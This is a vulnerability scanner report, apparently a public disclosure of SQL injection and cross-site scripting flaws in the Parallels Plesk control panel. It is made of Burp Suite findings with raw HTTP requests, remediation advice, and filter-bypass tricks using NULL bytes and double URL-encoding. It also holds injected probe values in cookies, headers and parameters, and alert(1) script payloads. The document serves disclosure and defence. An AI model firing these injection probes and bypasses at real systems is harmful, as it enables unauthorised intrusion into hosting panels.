CVE-2011-4725, CVE-2011-4726, CVE-2011-4727, CVE-2011-4728, CVE-2011-4729, CVE-2011-4730, CVE-2011-4731, CVE-2011-4732, CVE-2011-4733, Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6, Burp Suite Pro 1.4.1
XSS, SQL Injection and more.. Interim Report via Burp | Reminder to Burp your Site daily!
Report generated by Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6 at Sat Sep 24 17:03:36 CDT 2011.
XSS.CX Summary
Parallels Plesk Control Panel Version 20110407.20 for Windows and RHEL6 Linux Versions are vulnerable to XSS and other injection vulnerabilities beginning with a user of least-privs when logged into the Control Panel.
Various exploit are possible from XSS to DoS. This report is specific to proving CWE-79, XSS as a user of least authentication within the Control Panel Application. Initially reported (privately) to Plesk in
October 2010 in Parallels Ticket #1020740, these vulnerabilities, and others, still exist in the current releases of the Control Panel Products. Further reported to CERT in April 2011 with Ticket VU#541814. No contact received after June 1, 2011. Published September 21,2011 on XSS.CX.
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/
Issue detail
The locale cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the locale cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /admin/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Cookie: PHPSESSID=4f8553936d19c08a70c076cf2b95f490; locale=en-US%00'; psaContext=health
Response 1 (redirected)
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:04:10 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:04:20 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=home; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:04:20 GMT Server: sw-cp-server Content-Length: 16237
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/create
Issue detail
The contactInfoSection%5BcontactInfo%5D%5Bfax%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the contactInfoSection%5BcontactInfo%5D%5Bfax%5D parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the contactInfoSection%5BcontactInfo%5D%5Bfax%5D request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:00:14 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:00:15 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Content-Type: application/json Date: Fri, 23 Sep 2011 19:00:16 GMT Server: sw-cp-server Content-Length: 1037
{"formMessages":{"contactInfoSection":{"contactInfo":{"contactName":{"isEmpty":"Please provide a contact name."},"email":{"isEmpty":"Please provide an e-mail address."},"fax":{"regexNotMatch":"This fa ...[SNIP]... de a domain name."},"userName":{"isEmpty":"Please provide a username."},"password":{"isEmpty":"Please provide a password."},"passwordConfirmation":{"isEmpty":"Please provide a password."}}}},"status":"error","statusMessages":[{"status":"error","content":"Invalid URL was requested.","title":"Error"}]}
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:00:16 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:00:17 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Content-Type: application/json Date: Fri, 23 Sep 2011 19:00:17 GMT Server: sw-cp-server Content-Length: 966
{"formMessages":{"contactInfoSection":{"contactInfo":{"contactName":{"isEmpty":"Please provide a contact name."},"email":{"isEmpty":"Please provide an e-mail address."},"fax":{"regexNotMatch":"This fa ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/list
Issue detail
The searchFilter[resourceUsage][searchText] parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the searchFilter[resourceUsage][searchText] parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /admin/customer/list?force-show-search=true&searchFilter[resourceUsage][searchText]=overuse' HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Expires: Sun, 23 Oct 2011 19:19:32 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:19:33 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=deleted; expires=Thu, 23-Sep-2010 19:19:32 GMT; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:19:33 GMT Server: sw-cp-server Content-Length: 5734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <me ...[SNIP]... </span> SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '))' at line 6 </h2> ...[SNIP]...
Request 2
GET /admin/customer/list?force-show-search=true&searchFilter[resourceUsage][searchText]=overuse'' HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Expires: Sun, 23 Oct 2011 19:19:34 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:19:35 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Content-type: text/html Date: Fri, 23 Sep 2011 19:19:35 GMT Server: sw-cp-server Content-Length: 1262
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/list/reset-search/true/
Issue detail
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/home/reseller
Issue detail
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /admin/home/reseller HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1%2527 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/preferences?context=interface-pref Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=interface-pref; BarExpanded=True
Response 1
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 15:37:57 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 15:37:57 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=home; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 15:37:57 GMT Server: sw-cp-server Content-Length: 13175
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... </span> Invalid URL was requested. </div> ...[SNIP]...
Request 2
GET /admin/home/reseller HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1%2527%2527 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/preferences?context=interface-pref Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=interface-pref; BarExpanded=True
Response 2
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 15:37:57 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 15:37:57 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=home; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 15:37:57 GMT Server: sw-cp-server Content-Length: 12922
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/personal-info/
Issue detail
The psaContext cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the psaContext cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /admin/reseller/personal-info/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=customers%00'
Response 1
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 15:42:51 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 15:42:51 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=personal-info; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 15:42:51 GMT Server: sw-cp-server Content-Length: 28457
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... </span> Invalid URL was requested. </div> ...[SNIP]...
Request 2
GET /admin/reseller/personal-info/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=customers%00''
Response 2
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 15:42:51 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 15:42:51 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=personal-info; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 15:42:51 GMT Server: sw-cp-server Content-Length: 28204
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/subscription/list
Issue detail
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /admin/subscription%2527/list HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home
Response 1 (redirected)
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 15:45:39 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 15:45:40 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=home; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 15:45:40 GMT Server: sw-cp-server Content-Length: 12603
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/login_up.php3
Issue detail
The locale cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the locale cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the locale cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /login_up.php3 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US%2527
Response 1
HTTP/1.1 200 OK Last-Modified: Fri, 23 Sep 2011 18:24:33 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-Plesk: PSA-Key/PLSK016479390000 Date: Fri, 23 Sep 2011 18:24:33 GMT Server: sw-cp-server Content-Length: 5569
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
1.9. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/login_up.php3
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /login_up.php3?1%00'=1 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US
Response 1
HTTP/1.1 200 OK Last-Modified: Fri, 23 Sep 2011 18:25:20 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-Plesk: PSA-Key/PLSK016479390000 Date: Fri, 23 Sep 2011 18:25:20 GMT Server: sw-cp-server Content-Length: 5569
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/
Issue detail
The value of the start_page request parameter is copied into the value of a tag attribute which can contain JavaScript. The payload %00javascript%3aalert(1)//c4640c8d was submitted in the start_page parameter. This input was echoed as javascript:alert(1)//c4640c8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /?start_page=%00javascript%3aalert(1)//c4640c8d HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=reseller-tools; BarExpanded=True
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 15:56:09 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 15:56:11 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Content-Type: text/html; charset=utf-8 Date: Sat, 24 Sep 2011 15:56:11 GMT Server: sw-cp-server Content-Length: 1534
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/app/usage-data
Issue detail
The value of the searchFilter%5Bname%5D%5BsearchText%5D request parameter is copied into the HTML document as plain text between tags. The payload 10344<img%20src%3da%20onerror%3dalert(1)>4df115c2fd8 was submitted in the searchFilter%5Bname%5D%5BsearchText%5D parameter. This input was echoed as 10344<img src=a onerror=alert(1)>4df115c2fd8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
